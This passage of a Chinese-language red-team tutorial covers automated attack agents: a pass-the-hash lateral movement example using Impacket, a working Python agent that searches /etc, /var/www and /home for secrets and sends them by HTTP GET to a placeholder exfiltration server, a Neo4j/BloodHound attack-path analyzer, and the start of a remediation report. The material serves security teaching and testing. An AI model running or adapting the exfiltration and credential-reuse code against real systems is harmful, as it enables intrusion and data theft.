'username': 'Administrator',
'ntlm_hash': 'AAD3B435B51404EEAAD3B435B51404EE:4C71CF036ED39E13134375AD79B2222D' # Example hash
# 'password': 'AdminPassword123!' # Or a plaintext password
}
lateral_agent = LateralMovementAgent("192.168.1.10", compromised_creds)
# 假设内网段是192.168.1.0/24
lateral_agent.run("192.168.1.0/24")
说明:
- 此示例展示了如何利用 Impacket 库进行 Pass-the-Hash 攻击。
- Agent 会遍历已发现的可达主机,并尝试使用已窃取的凭据进行认证。
- 成功认证后,Agent 可以进一步执行命令、上传文件,或部署新的持久化机制。
5. 数据窃取/影响 (Data Exfiltration/Impact)
这是攻击的最终目标阶段,根据红队演练的目标,可能是窃取敏感数据、破坏系统功能或实现业务中断。
Agent 策略:
- 识别敏感数据: 扫描文件系统、数据库,查找信用卡号、社保号、知识产权文档等。
- 模拟数据传输: 将发现的敏感数据通过隐蔽通道(如 DNS 隧道、HTTP/S 隧道)传输到外部服务器。
- 服务中断: 模拟关闭关键服务、删除重要文件等操作,评估业务影响。
代码示例:Python 模拟敏感文件查找与数据外传 (HTTP GET)
import os
import requests
import re
class DataExfiltrationAgent:
def __init__(self, target_host_ip, exfil_server_url):
self.target_host_ip = target_host_ip
self.exfil_server_url = exfil_server_url
self.sensitive_files = []
self.exfiltrated_data = []
def find_sensitive_files(self, search_paths=["/etc", "/var/www", "/home"], keywords=["password", "confidential", "secret", "private key", "database"]):
"""
在目标主机上查找包含敏感关键字的文件。
这部分代码在受控主机上执行。
"""
print(f"[*] Searching for sensitive files on {self.target_host_ip}...")
for path in search_paths:
if not os.path.exists(path):
# print(f" [-] Path {path} does not exist on target.")
continue
for root, _, files in os.walk(path):
for file_name in files:
file_path = os.path.join(root, file_name)
try:
# 限制文件大小以避免读取大文件
if os.path.getsize(file_path) > 1024 * 1024 * 5: # 5MB limit
continue
with open(file_path, 'r', errors='ignore') as f:
content = f.read(4096) # Read first 4KB for keywords
for keyword in keywords:
if keyword.lower() in content.lower():
print(f" [!] Found sensitive file: {file_path} (keyword: {keyword})")
self.sensitive_files.append({
'path': file_path,
'reason': f"Contains keyword '{keyword}'"
})
break # Move to next file if one keyword is found
except Exception as e:
# print(f" [-] Error reading {file_path}: {e}")
pass
print(f" [+] Found {len(self.sensitive_files)} potential sensitive files.")
def exfiltrate_data_http_get(self, data_content, filename="data.txt"):
"""
通过HTTP GET请求模拟数据外传。
实际数据会编码或分块传输。
"""
print(f"[*] Attempting to exfiltrate data (HTTP GET) to {self.exfil_server_url}...")
try:
# Base64 encode the data to handle special characters and keep it in one line
import base64
encoded_data = base64.b64encode(data_content.encode('utf-8')).decode('utf-8')
# Simulate sending data as a query parameter
exfil_url = f"{self.exfil_server_url}?filename={filename}&data={encoded_data[:200]}" # Limit data for GET
response = requests.get(exfil_url, timeout=10)
response.raise_for_status()
print(f" [+] Data (first 200 chars) exfiltrated successfully via HTTP GET for {filename}.")
self.exfiltrated_data.append({
'filename': filename,
'method': 'HTTP GET',
'status': 'Success',
'exfil_url': exfil_url
})
except requests.exceptions.RequestException as e:
print(f" [-] Failed to exfiltrate data via HTTP GET for {filename}: {e}")
self.exfiltrated_data.append({
'filename': filename,
'method': 'HTTP GET',
'status': 'Failed',
'error': str(e)
})
except Exception as e:
print(f" [-] An unexpected error occurred during exfiltration: {e}")
def run(self):
self.find_sensitive_files()
if not self.sensitive_files:
print("[-] No sensitive files found to exfiltrate.")
return
for file_info in self.sensitive_files:
file_path = file_info['path']
try:
with open(file_path, 'r', errors='ignore') as f:
content = f.read() # Read full content for exfiltration attempt
# In a real scenario, we'd split large files, encrypt, etc.
self.exfiltrate_data_http_get(content, os.path.basename(file_path))
except Exception as e:
print(f" [-] Failed to read content of {file_path} for exfiltration: {e}")
print("n--- Data Exfiltration Summary ---")
if self.exfiltrated_data:
for item in self.exfiltrated_data:
print(f" - File: {item['filename']}")
print(f" Method: {item['method']}")
print(f" Status: {item['status']}")
if 'error' in item:
print(f" Error: {item['error']}")
else:
print(" No data was exfiltrated.")
print("-------------------------------")
if __name__ == "__main__":
# 假设Agent在某个Linux主机上运行,并有一个外部接收数据的服务器
# 实际中 exfil_server_url 是红队控制的服务器
exfil_agent = DataExfiltrationAgent("192.168.1.10", "http://your.exfil.server.com/receive_data")
# 为了演示,创建一个模拟的敏感文件
if not os.path.exists("/tmp/test_sensitive_data"):
os.makedirs("/tmp/test_sensitive_data")
with open("/tmp/test_sensitive_data/passwords.txt", "w") as f:
f.write("User: admin, Password: SuperSecretPassword123!n")
f.write("Confidential project report.n")
with open("/tmp/test_sensitive_data/project_plan.doc", "w") as f:
f.write("This is a confidential project plan document.n")
exfil_agent.run()
# 清理模拟文件
# os.remove("/tmp/test_sensitive_data/passwords.txt")
# os.remove("/tmp/test_sensitive_data/project_plan.doc")
# os.rmdir("/tmp/test_sensitive_data")
说明:
- Agent 会在目标文件系统中搜索包含特定关键字的文件。
- 通过 HTTP GET 请求,将数据编码后作为 URL 参数发送到外部服务器,模拟数据外传。
- 更高级的 Agent 会使用 DNS 隧道、ICMP 隧道等隐蔽通道,并对数据进行加密和分块传输。
自动化攻击路径生成与分析
这是红队 Agent 的核心智能所在。它不仅仅是执行单个攻击步骤,而是将所有侦察到的信息、发现的漏洞和成功执行的攻击链接起来,形成一个完整的攻击图(Attack Graph)。
实现方式:
- 数据模型: 将主机、用户、服务、漏洞、凭据等视为图的节点(Node),将它们之间的关系(如“主机 A 运行服务 B”、“用户 C 拥有主机 D 的权限”、“漏洞 E 存在于服务 F 上”)视为图的边(Edge)。
- 图数据库: 使用 Neo4j 这样的图数据库存储这些节点和边。
BloodHound就是一个很好的例子,它将 Active Directory 的复杂关系可视化。Agent 可以将收集到的数据导入 Neo4j。 - 路径搜索算法: 利用图算法(如 Dijkstra、A*)在攻击图中搜索从初始立足点(如外网 Web 服务器)到最终目标(如域控制器、敏感数据服务器)的最短或最有效的攻击路径。
- 风险评估: 对每个攻击路径上的漏洞和步骤进行风险评分,综合评估路径的难度和潜在影响。
代码示例:Python 与 Neo4j/BloodHound 数据模型 (概念性)
假设我们已经收集了主机、用户、组、漏洞等信息,并将其转换为 BloodHound 可识别的 JSON 格式或直接导入 Neo4j。
from neo4j import GraphDatabase
import json
class AttackPathAnalyzer:
def __init__(self, neo4j_uri, neo4j_user, neo4j_password):
self.driver = GraphDatabase.driver(neo4j_uri, auth=(neo4j_user, neo4j_password))
def close(self):
self.driver.close()
def import_bloodhound_data(self, json_file_path):
"""
模拟导入BloodHound收集到的数据到Neo4j。
实际BloodHound有自己的数据导入工具,这里演示其概念。
"""
print(f"[*] Importing BloodHound-like data from {json_file_path} into Neo4j...")
with open(json_file_path, 'r') as f:
data = json.load(f)
# 简化:只导入用户和组,并创建简单的关系
with self.driver.session() as session:
for user in data.get('users', []):
session.run(f"MERGE (u:User {{name: '{user['name']}', sid: '{user['sid']}'}})")
for group in data.get('groups', []):
session.run(f"MERGE (g:Group {{name: '{group['name']}', sid: '{group['sid']}'}})")
for user_in_group in data.get('useringroup', []):
session.run(f"""
MATCH (u:User {{sid: '{user_in_group['membersid']}'}})
MATCH (g:Group {{sid: '{user_in_group['groupsid']}'}})
MERGE (u)-[:MEMBER_OF]->(g)
""")
print(f" [+] Imported {len(data.get('users', []))} users and {len(data.get('groups', []))} groups.")
# 导入机器和漏洞信息 (概念性)
for host_info in data.get('hosts', []):
session.run(f"MERGE (h:Host {{ip: '{host_info['ip']}', os: '{host_info['os']}'}})")
for port in host_info.get('ports', []):
session.run(f"""
MATCH (h:Host {{ip: '{host_info['ip']}'}})
MERGE (p:Port {{port_id: {port['port_id']}, service_name: '{port['service_name']}'}})
MERGE (h)-[:HAS_OPEN_PORT]->(p)
""")
if port.get('vulnerabilities'):
for vuln in port['vulnerabilities']:
session.run(f"""
MATCH (p:Port {{port_id: {port['port_id']}, service_name: '{port['service_name']}'}})
MERGE (v:Vulnerability {{name: '{vuln['name']}', cve: '{vuln['cve']}'}})
MERGE (p)-[:HAS_VULNERABILITY]->(v)
""")
print(f" [+] Imported host and vulnerability information.")
def find_attack_paths(self, start_node_type, start_node_property, start_node_value, end_node_type, end_node_property, end_node_value, max_depth=10):
"""
在Neo4j中查找攻击路径。
这是一个简化版的路径查询,实际会更复杂。
"""
print(f"n[*] Searching for attack paths from {start_node_type} ({start_node_property}={start_node_value}) to {end_node_type} ({end_node_property}={end_node_value})...")
query = f"""
MATCH (start:{start_node_type} {{{start_node_property}: '{start_node_value}'}}),
(end:{end_node_type} {{{end_node_property}: '{end_node_value}'}})
CALL apoc.algo.allSimplePaths(start, end, 'MEMBER_OF|HAS_OPEN_PORT|HAS_VULNERABILITY|RUNS_SERVICE|OWNS|CAN_RDP|CAN_SMB', {max_depth}) YIELD path
RETURN path LIMIT 5
"""
# apoc.algo.allSimplePaths is a powerful APOC procedure for pathfinding.
# It needs to be installed in Neo4j.
# For a basic setup, we can use simple MATCH queries.
# Simplified query without APOC, finding paths between two nodes
simple_query = f"""
MATCH p = shortestPath(
(startNode:{start_node_type} {{{start_node_property}: '{start_node_value}'}})-[*1..{max_depth}]->(endNode:{end_node_type} {{{end_node_property}: '{end_node_value}'}})
)
RETURN p LIMIT 5
"""
paths_found = []
with self.driver.session() as session:
try:
result = session.run(simple_query)
for record in result:
path_nodes = []
path_edges = []
path = record["p"]
# Extract nodes
for node in path.nodes:
path_nodes.append(dict(node.items()))
# Extract relationships (edges)
for rel in path.relationships:
path_edges.append({
'start': dict(rel.start_node.items()),
'type': rel.type,
'end': dict(rel.end_node.items())
})
paths_found.append({'nodes': path_nodes, 'edges': path_edges})
if paths_found:
print(f" [+] Found {len(paths_found)} potential attack paths.")
for i, p in enumerate(paths_found):
print(f"n --- Path {i+1} ---")
# Print nodes in order
for j, node in enumerate(p['nodes']):
label_str = ":".join(node.labels)
props = ", ".join([f"{k}:'{v}'" for k,v in node.items() if k != 'name' and k != 'sid' and k != 'ip'])
main_id = node.get('name') or node.get('ip') or node.get('sid') or f"Node-{j}"
print(f" {j}. ({label_str}) {main_id} ({props})")
# Print relationships between them for clarity
for k, edge in enumerate(p['edges']):
start_id = edge['start'].get('name') or edge['start'].get('ip') or edge['start'].get('sid')
end_id = edge['end'].get('name') or edge['end'].get('ip') or edge['end'].get('sid')
print(f" -> {edge['type']} -> ")
else:
print(" [-] No attack paths found for the specified criteria.")
except Exception as e:
print(f" [-] Error finding paths: {e}")
return paths_found
if __name__ == "__main__":
# 假设Neo4j服务正在本地运行,并使用默认凭据
# 注意: 需要安装Neo4j数据库并启动
# pip install neo4j
neo4j_uri = "bolt://localhost:7687"
neo4j_user = "neo4j"
neo4j_password = "password" # 替换为你的Neo4j密码
path_analyzer = AttackPathAnalyzer(neo4j_uri, neo4j_user, neo4j_password)
# 1. 准备模拟的BloodHound数据文件
# 实际会从BloodHound.py或Agent的侦察模块生成
mock_bloodhound_data = {
"users": [
{"name": "[email protected]", "sid": "S-1-5-21-XXX-500"},
{"name": "Domain [email protected]", "sid": "S-1-5-21-YYY-500"}
],
"groups": [
{"name": "Domain [email protected]", "sid": "S-1-5-21-YYY-512"}
],
"useringroup": [
{"membersid": "S-1-5-21-YYY-500", "groupsid": "S-1-5-21-YYY-512"}
],
"hosts": [
{"ip": "192.168.1.10", "os": "Windows Server 2016", "ports": [
{"port_id": 80, "service_name": "http", "vulnerabilities": [{"name": "SQLi", "cve": "CVE-2023-XXXX"}]},
{"port_id": 445, "service_name": "smb"}
]},
{"ip": "192.168.1.20", "os": "Windows Server 2019 (DC)", "ports": [
{"port_id": 389, "service_name": "ldap"},
{"port_id": 445, "service_name": "smb"}
]}
]
}
with open("mock_bloodhound_data.json", "w") as f:
json.dump(mock_bloodhound_data, f, indent=2)
# 2. 导入数据
path_analyzer.import_bloodhound_data("mock_bloodhound_data.json")
# 3. 查找攻击路径
# 目标:从一个存在SQL注入的Web服务器 (192.168.1.10) 到域控制器 (192.168.1.20)
# 实际路径会更复杂,包含用户凭据、权限提升等多个步骤
path_analyzer.find_attack_paths(
start_node_type="Host", start_node_property="ip", start_node_value="192.168.1.10",
end_node_type="Host", end_node_property="ip", end_node_value="192.168.1.20"
)
# 查找从一个普通用户到域管理员的路径
path_analyzer.find_attack_paths(
start_node_type="User", start_node_property="name", start_node_value="[email protected]",
end_node_type="User", end_node_property="name", end_node_value="Domain [email protected]"
)
path_analyzer.close()
说明:
- Agent 首先将收集到的网络资产、用户、组、服务、漏洞等信息,按照图数据库的节点和边模型进行结构化。
- 通过 Neo4j 的 Cypher 查询语言,Agent 可以执行复杂的路径查找,例如查找从“任意暴露在互联网上的 Web 服务”到“包含敏感数据的数据库服务器”的最短路径。
shortestPath函数是 Cypher 中用于查找最短路径的内置函数。- 攻击路径的“边”代表着攻击者可以从一个节点移动到另一个节点的行动,例如“通过漏洞利用”、“使用凭据登录”、“提升权限”等。
漏洞修复建议生成
发现攻击路径并识别出关键漏洞后,Agent 的下一个重要任务是生成清晰、可操作的修复建议。
实现方式:
- 漏洞分类与优先级: 根据漏洞的类型(如 Web 漏洞、配置错误、凭据问题)、CVSS 评分、对攻击路径的影响程度等,对漏洞进行分类和优先级排序。
- 具体修复措施: 为每个漏洞提供详细的修复步骤和最佳实践。
- 影响分析: 说明修复该漏洞将如何中断或阻止攻击路径。
- 报告生成: 将所有信息整合为结构化报告(如 JSON、Markdown、PDF),方便安全团队和管理层查阅。
代码示例:Python 生成结构化修复建议报告
import json
import datetime
class RemediationSuggester:
def __init__(self, discovered_vulnerabilities, attack_paths):
self.vulnerabilities = discovered_vulnerabilities # List of dicts, e.g., from WebVulnerabilityScanner, Nmap parsing
self.attack_paths = attack_paths # List of dicts, from AttackPathAnalyzer
self.remediation_suggestions = []
def analyze_and_prioritize_vulnerabilities(self):
"""
分析漏洞,给出优先级和初步建议。
"""
print("[*] Analyzing vulnerabilities and prioritizing remediation...")
for vuln in self.vulnerabilities:
suggestion = {
'vulnerability_type': vuln.get('type', 'Unknown'),
'asset': vuln.get('url') or vuln.get('